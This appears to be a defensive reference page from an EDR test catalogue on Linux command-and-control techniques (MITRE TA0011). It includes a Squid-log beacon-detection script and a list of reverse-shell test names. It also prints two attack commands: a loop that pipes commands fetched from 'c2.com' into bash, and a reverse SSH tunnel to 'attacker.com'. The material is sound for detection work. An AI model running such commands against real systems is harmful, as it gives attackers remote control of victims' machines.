Command and Control - TA0011
Objective:
Establish and maintain communication with compromised systems. Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.
ID: TA0011
Linux Context:
C2 on Linux often uses HTTP/HTTPS via curl or wget, blending with web traffic. DNS tunneling (e.g., iodine) or SSH reverse tunnels (ssh -R) provide encrypted channels. Custom ELF implants or scripts (e.g., Python-based C2) connect to attacker domains, while legitimate services like Slack, Telegram, or GitHub APIs are abused for stealth. In cloud setups, attackers leverage S3 or DynamoDB for C2 data exchange. Persistence ensures that C2 survives reboots.
Key Techniques:
Application Layer Protocol (T1071): HTTP-based C2 with a custom client.
Encrypted Channel (T1573): SSH or TLS-based communication.
Ingress Tool Transfer (T1105): Downloading additional payloads.
Linux Example:
Running a polling loop such as
while true; do curl -s http://c2.com/cmd | bash; sleep 60; done
or a reverse SSH tunnel such as
ssh -R 1234:localhost:22 attacker.com
Defender Strategies:
Inspect outbound traffic with proxies (e.g., Squid), block known C2 domains, and monitor DNS anomalies. Deploy EDR for C2 detection.
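As an added example (not part of this page or of EDRmetry), the script below runs the proxy-inspection idea over Squid's native access.log and flags client/host pairs whose requests arrive at a near-constant cadence, the signature of a fixed-sleep polling loop like the curl example above. The log lines are constructed, and the min_hits and max_jitter thresholds are assumed tuning values.

```python
import re
import statistics
from collections import defaultdict

# Squid native access.log format:
# timestamp.ms  elapsed  client  code/status  bytes  method  URL  user  hier/host  type
SQUID_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+\S+\s+(?P<url>\S+)"
)

# Constructed sample lines: one host polling c2.com every 60 s, one browsing normally.
SAMPLE_LOG = """\
1700000000.101    45 10.0.0.5 TCP_MISS/200 128 GET http://c2.com/cmd - HIER_DIRECT/203.0.113.10 text/plain
1700000012.300   310 10.0.0.7 TCP_MISS/200 9021 GET http://news.example.org/ - HIER_DIRECT/198.51.100.3 text/html
1700000060.104    44 10.0.0.5 TCP_MISS/200 128 GET http://c2.com/cmd - HIER_DIRECT/203.0.113.10 text/plain
1700000120.099    46 10.0.0.5 TCP_MISS/200 128 GET http://c2.com/cmd - HIER_DIRECT/203.0.113.10 text/plain
1700000131.500   280 10.0.0.7 TCP_MISS/200 4410 GET http://news.example.org/a - HIER_DIRECT/198.51.100.3 text/html
1700000180.110    45 10.0.0.5 TCP_MISS/200 128 GET http://c2.com/cmd - HIER_DIRECT/203.0.113.10 text/plain
1700000240.097    47 10.0.0.5 TCP_MISS/200 128 GET http://c2.com/cmd - HIER_DIRECT/203.0.113.10 text/plain
1700000400.020   290 10.0.0.7 TCP_MISS/200 7700 GET http://news.example.org/b - HIER_DIRECT/198.51.100.3 text/html
"""

def host_of(url):
    return url.split("://", 1)[-1].split("/", 1)[0]

def find_beacons(log_text, min_hits=4, max_jitter=0.1):
    """Return {(client, host): mean_interval_s} for pairs whose request spacing
    is nearly constant. A scripted sleep leaves a tiny coefficient of
    variation across gaps; human browsing does not."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        m = SQUID_RE.match(line)
        if m:
            times[(m["client"], host_of(m["url"]))].append(float(m["ts"]))
    beacons = {}
    for key, ts in times.items():
        if len(ts) < min_hits:       # too few samples to judge cadence
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.fmean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else 1.0
        if jitter <= max_jitter:
            beacons[key] = round(mean, 1)
    return beacons

if __name__ == "__main__":
    for (client, host), interval in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {host}: ~{interval}s cadence, possible C2 beacon")
```

Real implants add jitter to defeat exactly this test, so treat max_jitter as a first-pass filter and combine it with domain reputation and response-size uniformity.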
The current list of corresponding EDRmetry test definitions includes:
EDR-T6254 - DNS AXFR Payload Delivery
EDR-T6264 - eBPF Keylogger + DNS RCE
EDR-T6212 - Emp3r0r C2 Shadowsocks C2
EDR-T6090 - Execute Offensive Linux Tunneling tools
EDR-T6076 - Execute process via ProxyChains
EDR-T6224 - Fileless Reverse shell with sshx
EDR-T6123.014 - Gsocket Secure Connection
EDR-T6123.013 - JSP+sh
EDR-T6075 - Make Non-standard port HTTP/HTTPS connection
EDR-T6126.004 - Merlin HTTPX C2
EDR-T6126.001 - Meterpreter reverse_tcp/https
EDR-T6126.005 - Mythic+Poseidon Websockets C2
EDR-T6126.003 - Mythic+Thanalos HTTP C2
EDR-T6200 - Ngrok Tunneling
EDR-T6123.008 - openssl+bash+/dev/fd/3
EDR-T6123.010 - PHP+bash
EDR-T6126.006 - Platypus C2
EDR-T6123.001 - Process Masquerading as kworker+exec+/dev/tcp
EDR-T6123.003 - Revshell curl+telnet
EDR-T6123.002 - Revshell curlshell
EDR-T6123.004 - Revshell mkfifo+nc
EDR-T6123.016 - Revshell on LKM call_usermodehelper()
EDR-T6123.012 - Revshell over GDB
EDR-T6123.009 - Revshell perl+ENV keys
EDR-T6123.006 - Revshell Perl+socket
EDR-T6123.015 - Revshell Python TLS
EDR-T6123.005 - Revshell python+socket+pty
EDR-T6123.007 - Revshell socat+bash
EDR-T6191 - Shell over HTTP streams
EDR-T6190 - Shell Over Reverse SSH
EDR-T6126.002 - Sliver C2 MTLS
EDR-T6134 - Upgrade a reverse shell to a PTY shell
EDR-T6011.011 - Webshell PHP FFI
EDR-T6148 - XOR shell_reverse_tcp Loader